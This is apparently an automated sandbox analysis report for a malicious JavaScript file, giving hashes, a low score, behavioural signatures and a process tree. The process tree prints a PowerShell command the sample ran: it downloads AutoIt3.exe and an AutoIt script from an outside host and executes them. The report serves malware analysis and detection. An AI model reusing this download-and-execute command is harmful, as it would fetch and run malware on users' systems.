Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
03-11-2023 01:50
Static task
static1
Behavioral task
behavioral1
Sample
XAC21SDADXCADVASD3.js
Resource
win7-20231023-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
XAC21SDADXCADVASD3.js
Resource
win10v2004-20231020-en
10 signatures
150 seconds
General
-
Target
XAC21SDADXCADVASD3.js
-
Size
135KB
-
MD5
2bacda979c484df5fd7784c99fc455b7
-
SHA1
428d1b68b85af4b318153f97d65214e3f6da19bd
-
SHA256
bac9fd3ebd3834621e46688476885dca7005e78eda48bc9c1271bf9e203afc6a
-
SHA512
6b4f40b7a76b9314c5c6513cc115e2665339181f3d88f50b165abb5a93f0575beeb204d52bc6af3180f3808a1abfb2bf54fd254a06fc9511ab7e651a1dce45d1
-
SSDEEP
1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0t:0T9U7hgaX6eerjqlI2IO6Mzqfl
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2620 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2896 wrote to memory of 2620 2896 wscript.exe 28 PID 2896 wrote to memory of 2620 2896 wscript.exe 28 PID 2896 wrote to memory of 2620 2896 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\XAC21SDADXCADVASD3.js1⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://jeraldsin3dsajdklafdmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://jeraldsin3dsajdklafdmonk.com:2351/msibbdthtgy' -OutFile 'bbdthtgy.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'bbdthtgy.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620
-